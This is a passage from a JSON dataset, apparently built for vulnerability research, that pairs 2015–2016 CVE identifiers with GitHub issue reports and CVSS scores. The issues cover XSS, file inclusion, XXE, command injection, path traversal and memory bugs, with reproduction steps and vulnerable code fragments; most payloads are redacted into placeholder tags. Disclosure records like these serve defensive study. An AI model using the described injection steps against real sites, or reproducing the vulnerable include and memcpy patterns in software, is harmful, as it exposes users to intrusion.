        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2015-9282",
        "Issue_Url_old": "https://github.com/grafana/grafana/issues/4117",
        "Issue_Url_new": "https://github.com/grafana/grafana/issues/4117",
        "Repo_new": "grafana/grafana",
        "Issue_Created_At": "2016-02-22T18:46:37Z",
        "description": "XSS: Option to disable and / or sanitize html in text panels. Text panels can contain any html and therefore pose an XSS security problem. Grafana should come with a backend option to disable and or sanitize html in text panels.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9282",
        "Issue_Url_old": "https://github.com/grafana/piechart-panel/issues/3",
        "Issue_Url_new": "https://github.com/grafana/piechart-panel/issues/3",
        "Repo_new": "grafana/piechart-panel",
        "Issue_Created_At": "2015-12-20T17:06:23Z",
        "description": "XSS in piechart legend. Applies to every type of legend On Graph, Table and Right side. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9284",
        "Issue_Url_old": "https://github.com/omniauth/omniauth/issues/1031",
        "Issue_Url_new": "https://github.com/omniauth/omniauth/issues/1031",
        "Repo_new": "omniauth/omniauth",
        "Issue_Created_At": "2021-02-01T10:28:11Z",
        "description": "APITAG CVE NUMBERTAG needs to be adapted for APITAG NUMBERTAG Configuration Provider Gem: APITAG Ruby Version: APITAG Framework: APITAG Platform: APITAG Expected Behavior Back when using APITAG NUMBERTAG I had written CVETAG non regression tests as instructed URLTAG . One test asserts that APITAG is raised when making a POST request without CSRF token. I expected this test to continue passing after upgrading, or finding instructions in the release notes on how it should be adapted after upgrading to APITAG NUMBERTAG Actual Behavior After upgrading to APITAG NUMBERTAG this test fails as no exception is caught. However the log shows that the exception was indeed raised: APITAG ERRORTAG APITAG To my understanding, the cause is that APITAG now catches the exception and sends it URLTAG to its APITAG . How should the test be adapted? Steps to Reproduce Install omniauth NUMBERTAG omniauth rails_csrf_protection NUMBERTAG copy and run the test linked URLTAG from the Wiki ( direct link URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9285",
        "Issue_Url_old": "https://github.com/esotalk/esoTalk/issues/444",
        "Issue_Url_new": "https://github.com/esotalk/esotalk/issues/444",
        "Repo_new": "esotalk/esotalk",
        "Issue_Created_At": "2015-12-30T06:59:49Z",
        "description": "Cross site scripting vulnerability. Hello, Cross site scripting vulnerability has been announced in (full disclosure mailing list)[ URLTAG According to this Curesec advisory timeline they were unable to contact you: APITAG Issue can be reproduced with following URL: ERRORTAG Do you have plans to fix this security vulnerability? If you do not plan to fix vulnerabilities in APITAG please mention it in the README or similar, thank you. As far as I can tell this issue does not yet have CVE identifier assigned. Have you request it?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9410",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/7",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/7",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-09-14T11:48:53Z",
        "description": "XSS Vulnerability in Blubrry APITAG Podcasting plugin Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name Malicious File upload Software: Blubrry APITAG Podcasting plugin Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: Malicious File upload vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. FILETAG and modify the value of tab variable with APITAG payload and send the request to the server. Now, the added XSS payload will be echoed back from the server without validating the input. It also affects FILETAG file, $table_prefix and corrupts the database connectivity. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The Post Request APITAG tab APITAG variable in the URL FILETAG is vulnerable to Cross Site Scripting (XSS) FILETAG APITAG NUMBERTAG APITAG Invalid HTTP script Request sent to the server through the vulnerable APITAG tab APITAG variable in the URL FILETAG and its echoed back in the HTTP Response without validation. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the value of tab variable in Blubrry APITAG Version NUMBERTAG Fill all the variables with APITAG payload and send the request to the server NUMBERTAG Now, the added XSS payload will be echoed back from the server without validating the input even after FILETAG file has been configured with XSS filter settings. APITAG APITAG NUMBERTAG Discovered in Blubrry APITAG Podcasting plugin NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor Responded, APITAG you for reporting this plugin. We're looking into it right now NUMBERTAG Fixed in Blubrry APITAG Podcasting plugin NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2015-9478",
        "Issue_Url_old": "https://github.com/scaron/prettyphoto/issues/149",
        "Issue_Url_new": "https://github.com/scaron/prettyphoto/issues/149",
        "Repo_new": "scaron/prettyphoto",
        "Issue_Created_At": "2015-05-05T10:28:15Z",
        "description": "any eta on xss fix. Someone reported an XSS vector in NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9538",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/2",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/2",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-08-28T11:58:55Z",
        "description": "Local File Inclusion (LFI). Word Press Product Bugs Report Bug Name LFI APITAG File Inclusion) Area Path APITAG Gallery by Photocrati Version NUMBERTAG APITAG Last Updated NUMBERTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Reported by sathish Cyber Security Works APITAG The existed filter name with Local File Inclusion (LFI) payload is executing when the user tries to modify the File path with LFI Payload & sent to the server. POC: FILETAG Figure NUMBERTAG HTTP Request & Response for the vulnerable dir variable with PATHTAG APITAG traversal) payload Note: Similarly, The user can fetch any details from any website hosted in the same server. Reproducing Steps NUMBERTAG Logon into the application NUMBERTAG Access APITAG Gallery by Photocrati Plugin NUMBERTAG Click on the path selection on the given folders NUMBERTAG Modify dir variable value with PATHTAG APITAG traversal) payload in the intercepting proxy NUMBERTAG Now You can see the internal available system folders",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9539",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/4",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/4",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-09-14T10:50:07Z",
        "description": "XSS Vulnerability in Fast Secure Contact form version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: Fast Secure Contact Form plugin Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin Fast Secure Contact Form Changelog: URLTAG Proof of concept ================ Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable fs_contact_form1[welcome] in Fast Secure Contact Form NUMBERTAG recently updated version) in the URL URLTAG NUMBERTAG Fill all the variables with APITAG payload and save it to view further NUMBERTAG Now, the added XSS payload will be executed whenever the user reviews it. APITAG APITAG NUMBERTAG Discovered in Fast Secure Contact Form plugin NUMBERTAG ersion NUMBERTAG Reported to WP Plugin NUMBERTAG WP Plugin responded, APITAG you for reporting this plugin. We're looking into it right now NUMBERTAG Fixed in NUMBERTAG ersion of Fast Secure Contact Form plugin APITAG by: APITAG Sathish from Cyber Security Works Pvt Ltd",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9544",
        "Issue_Url_old": "https://github.com/ofirdagan/cross-domain-local-storage/issues/17",
        "Issue_Url_new": "https://github.com/ofirdagan/cross-domain-local-storage/issues/17",
        "Repo_new": "ofirdagan/cross-domain-local-storage",
        "Issue_Created_At": "2015-08-13T00:40:18Z",
        "description": "Restricting domain by origins. There doesn't appear to be a programmatic way to define a whitelist of origins that the iframe will accept requests from. This is something that's recommended by the APITAG (API documentation)[ URLTAG It suggests that the receiver of function should \"always verify the sender's identity\".",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-9549",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/11",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/11",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-11-13T06:56:27Z",
        "description": "APITAG CMS NUMBERTAG POC. As per the documentation of the Ocportal, a value in a template that is not meant to contain HTML is marked as an escaped value ({VALUE }). This meant that \u2018html entities\u2019 are put in replacement of HTML control characters. FILETAG FILETAG Here the VALUE that is marked with symbol will be filtered with the XSS filter and it will be sanitized before displaying it to the user. But they forgot to mark FIELD_NAME in OCF_EMOTICON_CELL.tpl file. PATHTAG FILETAG The View_all link besides the emoticons in the following screen is having this FIELD_NAME variable FILETAG The View_all link is sending the following GET request to the server FILETAG The following is the source code of FILETAG file PATHTAG FILETAG The following is the code related to emoticons_script function in FILETAG file PATHTAG FILETAG Code that is loading the template file with the user entered input PATHTAG FILETAG This code is reading the GET request parameter field_name and displaying it back to the user without filtering because of the variable is not marked with symbol. Obviously it won\u2019t go for any filtration. GET request to FILETAG with script vector as value of field_name FILETAG And the inserted payload is reflecting back to the user as shown in the following screen. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-1000027",
        "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/24434",
        "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/24434",
        "Repo_new": "spring-projects/spring-framework",
        "Issue_Created_At": "2020-01-27T06:46:04Z",
        "description": "Sonartype vulnerability CVETAG in Spring web project. Affects NUMBERTAG RELEASE Issue Title : Sonartype vulnerability CVETAG in Spring web project Description Description from CVE Pivotal Spring Framework NUMBERTAG suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. Explanation The APITAG web package is vulnerable to deserialization of untrusted data leading to Remote Code Execution (RCE). The APITAG method in APITAG does not properly verify or restrict untrusted objects prior to deserializing them. An attacker can exploit this vulnerability by sending malicious requests containing crafted objects, which when deserialized, execute arbitrary code on the vulnerable system. NOTE: This vulnerability is related to a previously reported deserialization vulnerability ( CVETAG ) within the package, impacting a different class. Detection The application is vulnerable by using this component under specific scenarios as listed out in the advisory. Reference: URLTAG Recommendation There is no non vulnerable upgrade path for this component/package. We recommend investigating alternative components or a potential mitigating control. A warning has been provided in the official Javadocs of the APITAG class: \"WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.\" The developer's general advice also states: \"Do not use Java serialization for external endpoints, in particular not for unauthorized ones. HTTP invoker is not a well kept secret (or an \"oversight\") but rather the typical case of how a Spring application would expose serialization endpoints to begin with... he has a point that we should make this case all across our documentation, including the javadoc. But I don't really see a CVE case here, just a documentation improvement. Pivoltal will enhance their documentation for the NUMBERTAG and NUMBERTAG releases.\" Reference: URLTAG Root Cause FILETAG <= PATHTAG NUMBERTAG Advisories Third Party: CVETAG Third Party: URLTAG CVSS Details CVE CVSS NUMBERTAG CVSS Vector: PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10006",
        "Issue_Url_old": "https://github.com/nahsra/antisamy/issues/2",
        "Issue_Url_new": "https://github.com/nahsra/antisamy/issues/2",
        "Repo_new": "nahsra/antisamy",
        "Issue_Created_At": "2016-12-18T16:14:54Z",
        "description": "Style validation in attributes isn't properly handled. Privately reported issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10060",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/196",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/196",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-05-06T18:04:21Z",
        "description": "Completion of error handling. Would you like to add more error handling for return values from functions like the following? fputc]( FILETAG APITAG a byte on a stream\") \u21d2 APITAG URLTAG fwrite]( FILETAG APITAG output\") \u21d2 APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10065",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/129",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/129",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-02-12T22:31:09Z",
        "description": "out of bounds read in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-10075",
        "Issue_Url_old": "https://github.com/tqdm/tqdm/issues/328",
        "Issue_Url_new": "https://github.com/tqdm/tqdm/issues/328",
        "Repo_new": "tqdm/tqdm",
        "Issue_Created_At": "2016-12-25T20:36:17Z",
        "description": "APITAG insecure use of git. When you import tqdm , the APITAG module executes the following command: APITAG This was meant to check if the user is running a pre release version of tqdm. But most of the time there's no git repo at all, so this is just waste of time. Worse, the current working directory might be a part of an unrelated git repository, possibly a malicious one. At least with git NUMBERTAG or later, it's possible to craft a repo in which git log executes arbitrary code: CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-10082",
        "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/433",
        "Issue_Url_new": "https://github.com/s9y/serendipity/issues/433",
        "Repo_new": "s9y/serendipity",
        "Issue_Created_At": "2016-12-18T23:58:36Z",
        "description": "File Inclusion Attack Possible RCE. Hello, In FILETAG NUMBERTAG APITAG = APITAG NUMBERTAG include_once (S9Y_INCLUDE_PATH . PATHTAG ); As you can see a user controlled variable, APITAG is being sent to an APITAG function without a call, which results in file inclusion and a remote code execution by refering to any file with php payload in older PHP versions where nullbytes NUMBERTAG are allowed. Thanks,",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10083",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/575",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/575",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-12-18T23:40:33Z",
        "description": "Cross Site Scripting. In PATHTAG CODETAG As you can see a user controlled input $_GET['section'] ($filename) is being sent to APITAG printing out without no sanitization, this could result in cross site scripting because APITAG prints out content just like APITAG before exit. Fix: do htmlentities($filename);",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10084",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/572",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/572",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-12-18T23:29:28Z",
        "description": "File Inclusion Attack. Hello, There is a File Inclusion attack in the file PATHTAG It does: CODETAG The user controlled variable $page['tab'] is being sent to an APITAG without no checks. this will create file inclusion attacks possible. in older php versions, using a nullbyte attack, a code execution is also possible. Fix: put an array of allowed strings. Thanks,",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2016-10085",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/573",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/573",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-12-18T23:32:41Z",
        "description": "File Inclusion Attack NUMBERTAG There is a File Inclusion attack in the file PATHTAG APITAG A user controlled variable is being sent straight to APITAG this should have checks for allowed strings before that. Thanks,",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2016-10096",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/58",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/58",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2016-03-22T16:38:55Z",
        "description": "a security issues FILETAG for more details. Thanks",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10105",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/574",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/574",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-12-18T23:38:12Z",
        "description": "File Inclusion with Possible RCE. In PATHTAG NUMBERTAG sections = explode('/', $_GET['section NUMBERTAG filename = PHPWG_PLUGINS_PATH . implode('/', $sections NUMBERTAG if(is_file($filename NUMBERTAG include_once ($filename); As you can see, a user controlled variable is being sent stright to APITAG a person who managed to upload a .jpg file or any other content with PHP paylaod will just need to refer to that location and APITAG will execute it, making a code execution possible.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10127",
        "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/366",
        "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/366",
        "Repo_new": "identitypython/pysaml2",
        "Issue_Created_At": "2016-10-06T15:50:31Z",
        "description": "APITAG vulnerable to XXE. Roland ( APITAG Description An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. It seams that the APITAG library does not contemplate the possibility of SAML \"XML\" requests or responses containing External Entities or File Local inclusion resulting on malicious XML requests or responses being able to trigger an XXE attack. Proof of Concept APITAG APITAG For more information refer to: URLTAG URLTAG Recommendations: It is my recommendation that you should disable all these by default and if necessary give the user the option to enable them on their settings.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2016-10131",
        "Issue_Url_old": "https://github.com/bcit-ci/CodeIgniter/issues/4963",
        "Issue_Url_new": "https://github.com/bcit-ci/codeigniter/issues/4963",
        "Repo_new": "bcit-ci/codeigniter",
        "Issue_Created_At": "2016-12-26T17:22:08Z",
        "description": "APITAG A critical vulnerability. Please read: FILETAG Please update: PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10168",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/354",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/354",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2016-12-16T17:07:50Z",
        "description": "Signed Integer Overflow gd_io.c. My sample: ./gd2togif test_file /dev/null APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int'",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-10173",
        "Issue_Url_old": "https://github.com/halostatue/minitar/issues/16",
        "Issue_Url_new": "https://github.com/halostatue/minitar/issues/16",
        "Repo_new": "halostatue/minitar",
        "Issue_Created_At": "2016-08-22T20:08:00Z",
        "description": "Minitar directory traversal vulnerability. Overview Minitar allows attackers to overwrite arbitrary files during archive extraction via a .. (dot dot) in an extracted filename. Proof of Concept CODETAG Desired behaviour: ERRORTAG Example how bsdtar handles this kind of issues: ___ o Archive entries can have absolute pathnames. By default, tar removes the leading / character from filenames before restoring them to guard against this problem. o Archive entries can have pathnames that include .. components. By default, tar will not extract files containing .. components in their pathname. o Archive entries can exploit symbolic links to restore files to other directories. An archive can restore a symbolic link to another directory, then use that link to restore a file into that directory. To guard against this, tar checks each extracted path for symlinks. If the final path element is a symlink, it will be removed and replaced with the archive entry. If U is specified, any intermediate symlink will also be unconditionally removed. If neither U nor P is specified, tar will refuse to extract the entry. ___ Vulnerable, verified versions of gems: APITAG Related issue: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10193",
        "Issue_Url_old": "https://github.com/dejan/espeak-ruby/issues/7",
        "Issue_Url_new": "https://github.com/dejan/espeak-ruby/issues/7",
        "Repo_new": "dejan/espeak-ruby",
        "Issue_Created_At": "2016-04-13T13:43:07Z",
        "description": "Improper text validation enables read ENV variables. This enables you to read env variables: speech = APITAG APITAG May be it is possible to perform RCE injection.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10194",
        "Issue_Url_old": "https://github.com/spejman/festivaltts4r/issues/1",
        "Issue_Url_new": "https://github.com/spejman/festivaltts4r/issues/1",
        "Repo_new": "spejman/festivaltts4r",
        "Issue_Created_At": "2016-04-22T20:58:28Z",
        "description": "Command Injection. The APITAG and APITAG methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods. Proof of concept: CODETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10195",
        "Issue_Url_old": "https://github.com/libevent/libevent/issues/317",
        "Issue_Url_new": "https://github.com/libevent/libevent/issues/317",
        "Repo_new": "libevent/libevent",
        "Issue_Created_At": "2016-01-27T14:50:12Z",
        "description": "libevent dns remote stack overread vulnerability. Hello, the APITAG function in libevent's DNS code is vulnerable to a buffer overread NUMBERTAG if (cp != name_out NUMBERTAG if (cp NUMBERTAG end) return NUMBERTAG cp NUMBERTAG if (cp + label_len >= end) return NUMBERTAG memcpy(cp, packet + j, label_len NUMBERTAG cp += label_len NUMBERTAG j += label_len; No check is made against length before the memcpy occurs. This was found through the Tor bug bounty program and the discovery should be credited to APITAG Vranken'.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10196",
        "Issue_Url_old": "https://github.com/libevent/libevent/issues/318",
        "Issue_Url_new": "https://github.com/libevent/libevent/issues/318",
        "Repo_new": "libevent/libevent",
        "Issue_Created_At": "2016-01-27T14:53:17Z",
        "description": "libevent (stack) buffer overflow in APITAG Hello, in APITAG NUMBERTAG char buf NUMBERTAG cp = strchr(ip_as_string NUMBERTAG if ( ip_as_string NUMBERTAG int len NUMBERTAG if (!(cp = strchr(ip_as_string NUMBERTAG return NUMBERTAG len = (int) ( cp (ip_as_string NUMBERTAG if (len > (int)sizeof(buf NUMBERTAG return NUMBERTAG memcpy(buf, ip_as_string NUMBERTAG len); Length between '[' and ']' is cast to signed NUMBERTAG bit integer on line NUMBERTAG Is the length is more than NUMBERTAG INT_MAX), len will hold a negative value. Consequently, it will pass the check at line NUMBERTAG Segfault happens at line NUMBERTAG Generate a APITAG with generate APITAG then compile and run poc.c. See FILETAG for functions in tor that might be vulnerable. Please credit APITAG Vranken' for this discovery through the Tor bug bounty program.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10197",
        "Issue_Url_old": "https://github.com/libevent/libevent/issues/332",
        "Issue_Url_new": "https://github.com/libevent/libevent/issues/332",
        "Repo_new": "libevent/libevent",
        "Issue_Created_At": "2016-03-03T15:00:09Z",
        "description": "out of bounds read in APITAG Here follows a bug report by Guido Vranken via the APITAG bug bounty program_. Please credit Guido accordingly. Bug report The DNS code of Libevent contains this rather obvious OOB read: CODETAG If the length of APITAG is NUMBERTAG then line NUMBERTAG reads NUMBERTAG byte before the buffer. This will trigger a crash on ASAN protected builds. To reproduce: Build libevent with ASAN: APITAG Put the attached APITAG and APITAG in the source directory and then do: ERRORTAG This happens because I create a zero length string in APITAG : APITAG If you uncomment the last line, it will not crash. Guido",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10209",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/842",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/842",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-12-12T17:47:50Z",
